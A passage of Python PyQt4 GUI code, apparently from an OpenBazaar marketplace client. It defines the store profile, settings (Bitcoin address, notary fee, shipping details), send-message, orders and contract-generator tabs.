self.storeEmail.setFont(font)
self.storeEmail.setText(_fromUtf8(""))
self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
self.storeName = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.storeName.setFont(font)
self.storeName.setText(_fromUtf8(""))
self.storeName.setObjectName(_fromUtf8("storeName"))
self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.storeDescription = QtGui.QTextEdit(self.gridLayoutWidget)
self.storeDescription.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.storeDescription.setObjectName(_fromUtf8("storeDescription"))
self.gridLayout.addWidget(self.storeDescription, 5, 1, 1, 1)
self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
self.avatar_label = QtGui.QLabel(self)
self.avatar_label.setGeometry(QtCore.QRect(800, 20, 221, 211))
self.avatar_label.setText(_fromUtf8(""))
self.avatar_label.setObjectName(_fromUtf8("label_8"))
self.setWindowTitle(_translate("Form", "Form", None))
self.label_12.setText(_translate("Form", "My Listings:", None))
self.label.setText(_translate("Form", "User Name:", None))
self.label_3.setText(_translate("Form", "GUID:", None))
self.label_2.setText(_translate("Form", "User Email:", None))
self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_6.setText(_translate("Form", "Store Description", None))
self.label_4.setText(_translate("Form", "Public Key:", None))
##
# Set values in this tab
self.storeName.setText(merchant_representation.get_name())
self.storeEmail.setText(merchant_representation.get_email())
self.storeDescription.setText(merchant_representation.get_description())
self.bitcoinReceivingAddress.setText(merchant_representation.get_bitcoin_address())
self.GUID.setText(merchant_representation.get_guid())
self.publicKey.setText(merchant_representation.get_key())
self.avatar_label.setPixmap(merchant_representation.get_avatar().get_repr().toqpixmap())
self.avatar_label.setScaledContents(True)
##
# This method describes the action to be taken when a contract hash is clicked
def contract_clicked(self, item):
##
# Try to get contract data from item
try:
ric_repr = item.data(QtCore.Qt.UserRole).toPyObject()
except:
print 'exception'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
##
# Settings_Ui2
# This class is the GUI for the settings tab
# @param settings_dict: holds all the current user settings for drawing on the widget
class Settings_Ui2(QtGui.QWidget):
def __init__(self, settings_dict):
super(Settings_Ui2, self).__init__()
self.setObjectName(_fromUtf8("Settings_Ui2"))
self.resize(800, 1300)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 771, 1201))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.gridLayout_5 = QtGui.QGridLayout()
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.email_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.email_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
self.gridLayout_5.addWidget(self.email_lineEdit, 1, 1, 1, 1)
self.email_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.email_label.setFont(font)
self.email_label.setObjectName(_fromUtf8("email_label"))
self.gridLayout_5.addWidget(self.email_label, 1, 0, 1, 1)
self.communication_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.communication_label.setFont(font)
self.communication_label.setObjectName(_fromUtf8("communication_label"))
self.gridLayout_5.addWidget(self.communication_label, 0, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_5)
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.bitcoin_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.bitcoin_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.gridLayout.addWidget(self.bitcoin_lineEdit, 2, 1, 1, 1)
self.store_desc_edit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.store_desc_edit.setObjectName(_fromUtf8("store_desc_edit"))
self.gridLayout.addWidget(self.store_desc_edit, 3, 1, 1, 1)
self.nickname_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.nickname_label.setFont(font)
self.nickname_label.setObjectName(_fromUtf8("nickname_label"))
self.gridLayout.addWidget(self.nickname_label, 1, 0, 1, 1)
self.nickname_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.gridLayout.addWidget(self.nickname_lineEdit, 1, 1, 1, 1)
self.bitcoin_address_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.bitcoin_address_label.setFont(font)
self.bitcoin_address_label.setObjectName(_fromUtf8("bitcoin_address_label"))
self.gridLayout.addWidget(self.bitcoin_address_label, 2, 0, 1, 1)
self.store_details_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.store_details_label.setFont(font)
self.store_details_label.setObjectName(_fromUtf8("store_details_label"))
self.gridLayout.addWidget(self.store_details_label, 0, 0, 1, 1)
self.store_desc_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.store_desc_label.setFont(font)
self.store_desc_label.setObjectName(_fromUtf8("store_desc_label"))
self.gridLayout.addWidget(self.store_desc_label, 3, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout)
self.gridLayout_3 = QtGui.QGridLayout()
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.add_notary_label = QtGui.QPushButton(self.verticalLayoutWidget)
self.add_notary_label.setObjectName(_fromUtf8("add_notary_label"))
self.gridLayout_3.addWidget(self.add_notary_label, 4, 1, 1, 1)
self.known_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
self.known_notaries_label.setObjectName(_fromUtf8("known_notaries_label"))
self.gridLayout_3.addWidget(self.known_notaries_label, 3, 0, 1, 1)
self.trusted_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.trusted_notaries_label.setFont(font)
self.trusted_notaries_label.setObjectName(_fromUtf8("trusted_notaries_label"))
self.gridLayout_3.addWidget(self.trusted_notaries_label, 1, 0, 1, 1)
self.add_notary_line = QtGui.QLineEdit(self.verticalLayoutWidget)
self.add_notary_line.setObjectName(_fromUtf8("add_notary_line"))
self.gridLayout_3.addWidget(self.add_notary_line, 4, 0, 1, 1)
self.gridLayout_4 = QtGui.QGridLayout()
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.bitcoin_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.bitcoin_pubkey_label.setFont(font)
self.bitcoin_pubkey_label.setObjectName(_fromUtf8("bitcoin_pubkey_label"))
self.gridLayout_4.addWidget(self.bitcoin_pubkey_label, 1, 0, 1, 1)
self.keys_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.keys_label.setFont(font)
self.keys_label.setObjectName(_fromUtf8("keys_label"))
self.gridLayout_4.addWidget(self.keys_label, 0, 0, 1, 1)
self.guid_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.guid_label.setFont(font)
self.guid_label.setObjectName(_fromUtf8("guid_label"))
self.gridLayout_4.addWidget(self.guid_label, 2, 0, 1, 1)
self.gpg_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.gpg_pubkey_label.setFont(font)
self.gpg_pubkey_label.setObjectName(_fromUtf8("gpg_pubkey_label"))
self.gridLayout_4.addWidget(self.gpg_pubkey_label, 3, 0, 1, 1)
self.guid_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.guid_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
self.gridLayout_4.addWidget(self.guid_lineEdit, 2, 1, 1, 1)
self.pubkey_textedit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.pubkey_textedit.setObjectName(_fromUtf8("pubkey_textedit"))
self.gridLayout_4.addWidget(self.pubkey_textedit, 3, 1, 1, 1)
self.bitcoin_pubkey_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.bitcoin_pubkey_textEdit.setObjectName(_fromUtf8("bitcoin_pubkey_textEdit"))
self.gridLayout_4.addWidget(self.bitcoin_pubkey_textEdit, 1, 1, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout_4, 0, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_3)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.notary_details_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.notary_details_label.setFont(font)
self.notary_details_label.setObjectName(_fromUtf8("notary_details_label"))
self.gridLayout_2.addWidget(self.notary_details_label, 0, 0, 1, 1)
self.notary_percent_about_label = QtGui.QTextBrowser(self.verticalLayoutWidget)
self.notary_percent_about_label.setAutoFillBackground(False)
self.notary_percent_about_label.setObjectName(_fromUtf8("notary_percent_about_label"))
self.gridLayout_2.addWidget(self.notary_percent_about_label, 2, 1, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(self.verticalLayoutWidget)
self.buttonBox.setLayoutDirection(QtCore.Qt.RightToLeft)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.No|QtGui.QDialogButtonBox.Yes)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.gridLayout_2.addWidget(self.buttonBox, 1, 1, 1, 1)
self.percent_comboBox = QtGui.QComboBox(self.verticalLayoutWidget)
self.percent_comboBox.setObjectName(_fromUtf8("percent_comboBox"))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.gridLayout_2.addWidget(self.percent_comboBox, 3, 1, 1, 1)
self.make_notary_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.make_notary_label.setFont(font)
self.make_notary_label.setObjectName(_fromUtf8("make_notary_label"))
self.gridLayout_2.addWidget(self.make_notary_label, 1, 0, 1, 1)
self.percent_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.percent_label.setFont(font)
self.percent_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.percent_label.setObjectName(_fromUtf8("percent_label"))
self.gridLayout_2.addWidget(self.percent_label, 3, 0, 1, 1)
self.service_description_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.service_description_label.setFont(font)
self.service_description_label.setObjectName(_fromUtf8("service_description_label"))
self.gridLayout_2.addWidget(self.service_description_label, 4, 0, 1, 1)
self.notary_servicedesc_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.notary_servicedesc_textEdit.setObjectName(_fromUtf8("notary_servicedesc_textEdit"))
self.gridLayout_2.addWidget(self.notary_servicedesc_textEdit, 4, 1, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_2)
self.gridLayout_6 = QtGui.QGridLayout()
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.shipping_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.shipping_label.setFont(font)
self.shipping_label.setObjectName(_fromUtf8("shipping_label"))
self.gridLayout_6.addWidget(self.shipping_label, 0, 0, 1, 1)
self.city_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.city_label.setFont(font)
self.city_label.setObjectName(_fromUtf8("city_label"))
self.gridLayout_6.addWidget(self.city_label, 5, 0, 1, 1)
self.recipient_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.recipient_label.setFont(font)
self.recipient_label.setObjectName(_fromUtf8("recipient_label"))
self.gridLayout_6.addWidget(self.recipient_label, 2, 0, 1, 1)
self.recipient_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.recipient_lineEdit.setObjectName(_fromUtf8("recipient_lineEdit"))
self.gridLayout_6.addWidget(self.recipient_lineEdit, 2, 1, 1, 1)
self.province_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.province_label.setFont(font)
self.province_label.setObjectName(_fromUtf8("province_label"))
self.gridLayout_6.addWidget(self.province_label, 6, 0, 1, 1)
self.zip_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.zip_label.setFont(font)
self.zip_label.setObjectName(_fromUtf8("zip_label"))
self.gridLayout_6.addWidget(self.zip_label, 7, 0, 1, 1)
self.street1_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.street1_label.setFont(font)
self.street1_label.setObjectName(_fromUtf8("street1_label"))
self.gridLayout_6.addWidget(self.street1_label, 3, 0, 1, 1)
self.street2_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.street2_label.setFont(font)
self.street2_label.setObjectName(_fromUtf8("street2_label"))
self.gridLayout_6.addWidget(self.street2_label, 4, 0, 1, 1)
self.country_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.country_label.setFont(font)
self.country_label.setObjectName(_fromUtf8("country_label"))
self.gridLayout_6.addWidget(self.country_label, 8, 0, 1, 1)
self.street1_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.gridLayout_6.addWidget(self.street1_lineEdit, 3, 1, 1, 1)
self.street2_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.street2_lineEdit.setObjectName(_fromUtf8("street2_lineEdit"))
self.gridLayout_6.addWidget(self.street2_lineEdit, 4, 1, 1, 1)
self.city_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.city_lineEdit.setObjectName(_fromUtf8("city_lineEdit"))
self.gridLayout_6.addWidget(self.city_lineEdit, 5, 1, 1, 1)
self.province_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.province_lineEdit.setObjectName(_fromUtf8("province_lineEdit"))
self.gridLayout_6.addWidget(self.province_lineEdit, 6, 1, 1, 1)
self.zip_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.zip_lineEdit.setObjectName(_fromUtf8("zip_lineEdit"))
self.gridLayout_6.addWidget(self.zip_lineEdit, 7, 1, 1, 1)
self.country_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.country_lineEdit.setObjectName(_fromUtf8("country_lineEdit"))
self.gridLayout_6.addWidget(self.country_lineEdit, 8, 1, 1, 1)
self.encryption_message = QtGui.QTextBrowser(self.verticalLayoutWidget)
self.encryption_message.setObjectName(_fromUtf8("encryption_message"))
self.gridLayout_6.addWidget(self.encryption_message, 1, 0, 1, 2)
self.verticalLayout.addLayout(self.gridLayout_6)
self.save_button = QtGui.QPushButton(self)
self.save_button.setGeometry(QtCore.QRect(680, 1220, 98, 27))
self.save_button.setObjectName(_fromUtf8("save_button"))
self.setWindowTitle(_translate("Form", "Form", None))
self.email_label.setText(_translate("Form", "Email", None))
self.communication_label.setText(_translate("Form", "Communication Info", None))
self.bitcoin_lineEdit.setText(_translate("Form", "Bitcoin address to send all incoming fees or refunds to", None))
self.store_desc_edit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a short description about your store</p></body></html>", None))
self.nickname_label.setText(_translate("Form", "Nickname", None))
self.bitcoin_address_label.setText(_translate("Form", "Bitcoin Receiving Address", None))
self.store_details_label.setText(_translate("Form", "Store Details", None))
self.store_desc_label.setText(_translate("Form", "Store Description", None))
self.add_notary_label.setText(_translate("Form", "Add", None))
self.known_notaries_label.setText(_translate("Form", "The addresses below are notaries used during transactions.", None))
self.trusted_notaries_label.setText(_translate("Form", "Trusted Notaries", None))
self.add_notary_line.setText(_translate("Form", "Enter a notary\'s OB guid", None))
self.bitcoin_pubkey_label.setText(_translate("Form", "Bitcoin Public Key (Uncompressed)", None))
self.keys_label.setText(_translate("Form", "OpenBazaar Keys", None))
self.guid_label.setText(_translate("Form", "OpenBazaar GUID", None))
self.gpg_pubkey_label.setText(_translate("Form", "PGP Public Key", None))
self.notary_details_label.setText(_translate("Form", "Notary Details", None))
self.notary_percent_about_label.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:600;\">Fees</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If your services are needed during a dispute, a fee can be requested from the participants of the transaction you are involved with. What percentage of each transaction would you like to request for your services?</p></body></html>", None))
self.percent_comboBox.setItemText(0, _translate("Form", "0", None))
self.percent_comboBox.setItemText(1, _translate("Form", "1", None))
self.percent_comboBox.setItemText(2, _translate("Form", "2", None))
self.percent_comboBox.setItemText(3, _translate("Form", "3", None))
self.percent_comboBox.setItemText(4, _translate("Form", "4", None))
self.percent_comboBox.setItemText(5, _translate("Form", "5", None))
self.percent_comboBox.setItemText(6, _translate("Form", "6", None))
self.percent_comboBox.setItemText(7, _translate("Form", "7", None))
self.percent_comboBox.setItemText(8, _translate("Form", "8", None))
self.percent_comboBox.setItemText(9, _translate("Form", "9", None))
self.percent_comboBox.setItemText(10, _translate("Form", "10", None))
self.make_notary_label.setText(_translate("Form", "Make me a notary", None))
self.percent_label.setText(_translate("Form", "%", None))
self.service_description_label.setText(_translate("Form", "Description of your services", None))
self.shipping_label.setText(_translate("Form", "Shipping Information", None))
self.city_label.setText(_translate("Form", "City", None))
self.recipient_label.setText(_translate("Form", "Recipient Name", None))
self.recipient_lineEdit.setText(_translate("Form", "Name visible on your package", None))
self.province_label.setText(_translate("Form", "Province/Region", None))
self.zip_label.setText(_translate("Form", "Zip", None))
self.street1_label.setText(_translate("Form", "Street 1", None))
self.street2_label.setText(_translate("Form", "Street 2", None))
self.country_label.setText(_translate("Form", "Country", None))
self.encryption_message.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Note: This information will be encrypted and only be sent to your seller when you have marked your order for payment.</p></body></html>""", None))
self.save_button.setText(_translate("Form", "Save Changes", None))
##
# Fill in existing user settings
#
self.email_lineEdit.setText(settings_dict['email'])
self.nickname_lineEdit.setText(settings_dict['nickname'])
self.bitcoin_lineEdit.setText(settings_dict['bitcoinReceivingAddress'])
self.store_desc_edit.setText(settings_dict['storeDescription'])
self.pubkey_textedit.setText(settings_dict['pubkey'])
self.notary_servicedesc_textEdit.setText(settings_dict['description'])
self.percent_comboBox.setCurrentIndex(int(settings_dict['percentage']))
self.recipient_lineEdit.setText(settings_dict['shippingInformation']['recipient'])
self.street1_lineEdit.setText(settings_dict['shippingInformation']['street1'])
self.street2_lineEdit.setText(settings_dict['shippingInformation']['street2'])
self.city_lineEdit.setText(settings_dict['shippingInformation']['city'])
self.province_lineEdit.setText(settings_dict['shippingInformation']['province/state/region'])
self.zip_lineEdit.setText(settings_dict['shippingInformation']['postal/zip'])
self.country_lineEdit.setText(settings_dict['shippingInformation']['country'])
self.guid_lineEdit.setText(settings_dict['guid'].encode('hex'))
self.save_button.clicked.connect(self.saveChanges)
##
# saveChanges(self)
# Collects all filled in user data and sends to settings for saving
def saveChanges(self):
ret = dict()
ret['nickname'] = self.nickname_lineEdit.text()
ret['email'] = self.email_lineEdit.text()
ret['bitcoinReceivingAddress'] = self.bitcoin_lineEdit.text()
ret['storeDescription'] = self.store_desc_edit.toPlainText()
ret['percentage'] = str(self.percent_comboBox.currentIndex())
ret['description'] = self.notary_servicedesc_textEdit.toPlainText()
shipping = dict()
shipping['recipient'] = self.recipient_lineEdit.text()
shipping['street1'] = self.street1_lineEdit.text()
shipping['street2'] = self.street2_lineEdit.text()
shipping['city'] = self.city_lineEdit.text()
shipping['province/state/region'] = self.province_lineEdit.text()
shipping['postal/zip'] = self.zip_lineEdit.text()
shipping['country'] = self.country_lineEdit.text()
ret['shippingInformation'] = shipping
ret['avatarURL'] = ""
ret['myMerchants'] = ""
ret['isNotary'] = ""
self.window().id_module.set_settings(ret)
self.window().redraw()
##
# This class contains the UI for the "Send a message" tab
#
class SendMessage_Ui2(QtGui.QWidget):
##
# Constructor
# Creates the "Send Message" tab
def __init__(self):
super(SendMessage_Ui2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(400, 413)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 391))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.send_message_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.send_message_label.setFont(font)
self.send_message_label.setObjectName(_fromUtf8("keys_label"))
self.verticalLayout.addWidget(self.send_message_label)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
self.label.setObjectName(_fromUtf8("store_details_label"))
self.horizontalLayout.addWidget(self.label)
self.lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.lineEdit.setObjectName(_fromUtf8("nickname_lineEdit"))
self.horizontalLayout.addWidget(self.lineEdit)
self.verticalLayout.addLayout(self.horizontalLayout)
self.message_subject_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.message_subject_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.verticalLayout.addWidget(self.message_subject_lineEdit)
self.message_body_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.message_body_textEdit.setObjectName(_fromUtf8("store_desc_edit"))
self.verticalLayout.addWidget(self.message_body_textEdit)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem = QtGui.QSpacerItem(100, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.cancel_button = QtGui.QPushButton(self.verticalLayoutWidget)
self.cancel_button.setObjectName(_fromUtf8("add_notary_label"))
self.horizontalLayout_2.addWidget(self.cancel_button)
self.send_button = QtGui.QPushButton(self.verticalLayoutWidget)
self.send_button.setAutoFillBackground(False)
self.send_button.setObjectName(_fromUtf8("save_button"))
self.horizontalLayout_2.addWidget(self.send_button)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.setWindowTitle(_translate("Form", "Form", None))
self.send_message_label.setText(_translate("Form", "Send Message", None))
self.label.setText(_translate("Form", "To:", None))
self.message_subject_lineEdit.setText(_translate("Form", "Enter a subject line", None))
self.message_body_textEdit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a message</p></body></html>", None))
self.cancel_button.setText(_translate("Form", "Cancel", None))
self.send_button.setText(_translate("Form", "Send", None))
##
# This class contains the UI for the "My Orders" menu
#
class Ui_OrdersMenu(object):
##
#
def setupUi(self, OrdersMenu):
OrdersMenu.setObjectName(_fromUtf8("OrdersMenu"))
OrdersMenu.resize(400, 300)
self.verticalLayoutWidget = QtGui.QWidget(OrdersMenu)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 281))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.OrderLabel = QtGui.QLabel(self.verticalLayoutWidget)
self.OrderLabel.setObjectName(_fromUtf8("OrderLabel"))
self.verticalLayout.addWidget(self.OrderLabel)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.seller = QtGui.QListView(self.verticalLayoutWidget)
self.seller.setObjectName(_fromUtf8("seller"))
self.horizontalLayout.addWidget(self.seller)
self.sellerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
self.sellerBar.setOrientation(QtCore.Qt.Vertical)
self.sellerBar.setObjectName(_fromUtf8("sellerBar"))
self.horizontalLayout.addWidget(self.sellerBar)
self.buyerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
self.buyerBar.setOrientation(QtCore.Qt.Vertical)
self.buyerBar.setObjectName(_fromUtf8("buyerBar"))
self.horizontalLayout.addWidget(self.buyerBar)
self.buyer = QtGui.QListView(self.verticalLayoutWidget)
self.buyer.setObjectName(_fromUtf8("buyer"))
self.horizontalLayout.addWidget(self.buyer)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(OrdersMenu)
QtCore.QMetaObject.connectSlotsByName(OrdersMenu)
def retranslateUi(self, OrdersMenu):
OrdersMenu.setWindowTitle(_translate("OrdersMenu", "Form", None))
self.OrderLabel.setText(_translate("OrdersMenu", "Orders", None))
##
# ContractGenUi2
# This class holds the UI for the contract generator
class ContractGenUi2(QtGui.QWidget):
##
# Constructor
# Draws the layout of the "New Contract" tab
def __init__(self):
super(ContractGenUi2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(788, 376)
